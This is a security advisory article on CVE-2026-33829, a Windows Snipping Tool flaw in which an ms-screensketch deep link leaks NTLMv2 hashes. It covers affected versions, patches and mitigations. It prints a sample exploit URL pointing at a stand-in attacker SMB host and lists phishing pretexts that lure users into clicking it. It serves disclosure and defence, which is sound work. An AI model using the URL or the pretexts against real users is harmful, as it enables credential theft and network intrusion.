A critical-grade social engineering risk disguised as a moderate-severity flaw. Here’s everything you need to know about the Windows Snipping Tool NTLM credential leak vulnerability.
Microsoft patched a newly disclosed information disclosure vulnerability in the Windows Snipping Tool on April 14, 2026, as part of its monthly Patch Tuesday security update.
Tracked as CVE-2026-33829, this flaw allows remote attackers to silently steal NTLMv2 authentication hashes from unsuspecting users through nothing more than a cleverly crafted link.
While rated moderate in severity, security researchers warn that the real-world exploitation risk is substantially higher, especially in enterprise environments, where NTLM credential theft can fuel lateral movement and privilege-escalation campaigns.
CVE-2026-33829: Windows Snipping Tool Leak
CVE-2026-33829 is classified as a sensitive information exposure (CWE-200) vulnerability and carries a CVSS 3.1 base score of 4.3, placing it at moderate severity.
The vulnerability originates from how the Windows Snipping Tool processes deep links through its registered URI scheme, ms-screensketch.
The application’s filePath The parameter designed to load an image file into the editor fails to perform proper input validation before initiating a remote connection.
An attacker can exploit this by setting filePath to a UNC path pointing to an attacker-controlled SMB server, causing Windows to initiate an authenticated SMB handshake and leak the user’s Net-NTLMv2 hash in the process.
Exploiting CVE-2026-33829 is deceptively simple and requires no special privileges on the part of the attacker. The attack chain unfolds as follows:
- Attacker sets up a rogue SMB listener on a publicly accessible server to capture incoming NTLM authentication responses
- A malicious URL is crafted using the
ms-screensketchdeep link schema, withfilePathpointing to the attacker’s SMB share, for example:ms-screensketch:edit?&filePath=\\attacker.server\file.png&isTemporary=false&saved=true&source=Toast - The victim is lured into clicking the link via a phishing email, compromised website, or social media message
- Windows prompts the user to confirm opening the Snipping Tool, a seemingly harmless action
- Snipping Tool silently initiates an outbound SMB connection to the attacker’s server, transmitting the user’s NTLMv2 hash without any visible indication.
The attack is network-based, low-complexity, and requires only a single user click to succeed.
Social Engineering Potential
What makes CVE-2026-33829 particularly dangerous is its deceptive plausibility. Because the Snipping Tool actually opens as expected after the victim clicks the link, there is no visible sign that anything malicious has occurred.
Threat actors can exploit this invisibility through realistic pretexts such as:
- Asking employees to crop or edit a corporate wallpaper or badge photo
- Hosting a URL resembling a legitimate image CDN link (e.g.,
https://snip.example.com/wallpaper/image.png) that secretly serves an HTML page, auto-triggering the deep link - Embedding malicious links in HR communications, IT support tickets, or internal wikis to maximize credibility
The victim sees the familiar Snipping Tool interface, while NTLM authentication occurs invisibly in the background, making this one of the more socially potent phishing vectors disclosed in recent months.
Impact of NTLMv2 Hash Theft
Although Microsoft classifies the vulnerability as “moderate” and states exploitation is “unlikely,” security experts highlight that NTLMv2 hash exposure carries compounding risks beyond the initial leak. Captured hashes can be weaponized in multiple ways:
- Pass-the-Hash (PtH) attacks – Reusing captured hashes to authenticate as the victim without knowing the plaintext password
- NTLM relay attacks – Forwarding captured authentication to other internal services to gain unauthorized access
- Offline hash cracking – Using tools like Hashcat to brute-force the Net-NTLMv2 hash into a cleartext password
- Lateral movement – Using compromised credentials to pivot across enterprise systems, escalating access progressively
Notably, the attack results in a loss of confidentiality but does not grant write access or affect system availability. However, in enterprise environments where NTLM is still widely used, a single leaked hash can be the entry point for a full network compromise.
Affected Platforms and Patch Details
CVE-2026-33829 affects 31 platform variants across Windows 10, Windows 11, and Windows Server. Microsoft confirmed that no workarounds exist, and patching is the only fix.
| Platform | Affected Versions | KB Update |
|---|---|---|
| Windows 11 | 23H2, 24H2, 25H2, 26H1 | KB5082052, KB5083769, KB5083768 |
| Windows 11 | 21H2, 22H2 | KB5082200 |
| Windows 10 | 1607, 1809 | KB5082198, KB5082123 |
| Windows Server | 2025, 2022, 2019, 2016, 2012 | KB5082063, KB5082142, KB5082123, KB5082126 |
A public proof-of-concept (PoC) exploit was released on April 20, 2026, raising the urgency for immediate patching. The April 2026 Patch Tuesday addressed 163–164 CVEs, including two zero-day vulnerabilities, making it one of Microsoft’s largest monthly update releases in recent memory.
Immediate Mitigation
- Apply the April 14, 2026, security updates immediately via Windows Update or the Microsoft Update Catalog.
- Block outbound SMB traffic (TCP port 445) at the firewall level to prevent external NTLM coercion
- Consider turning off NTLM authentication in environments that support Kerberos-only workflows via Group Policy.
- Deploy Microsoft Defender XDR detection rules to monitor for anomalous
ms-screensketchURI invocations - Train employees to recognize social engineering pretexts that involve clicking image or file links from unknown sources.
FAQ
Q1: What is CVE-2026-33829?
CVE-2026-33829 is a Windows Snipping Tool vulnerability that leaks a user’s NTLMv2 authentication hash to a remote attacker-controlled SMB server via the ms-screensketch URI scheme.
Q2: Which Windows versions are affected by CVE-2026-33829?
The vulnerability affects Windows 10, Windows 11 (all recent versions), and multiple Windows Server editions (2012 through 2025), totaling 31 distinct platform variants.
Q3: Has CVE-2026-33829 been exploited in the wild?
As of April 2026, Microsoft has not confirmed any active in-the-wild exploitation, though a public PoC was released on April 20, 2026, increasing the risk of imminent abuse.
Q4: How do I fix the CVE-2026-33829 Snipping Tool vulnerability?
Install the April 14, 2026, Patch Tuesday security updates (e.g., KB5083769 for Windows 11 24H2/25H2). No workarounds exist, making patching the only confirmed remediation.
Site: http://thecybrdef.com
About the Author
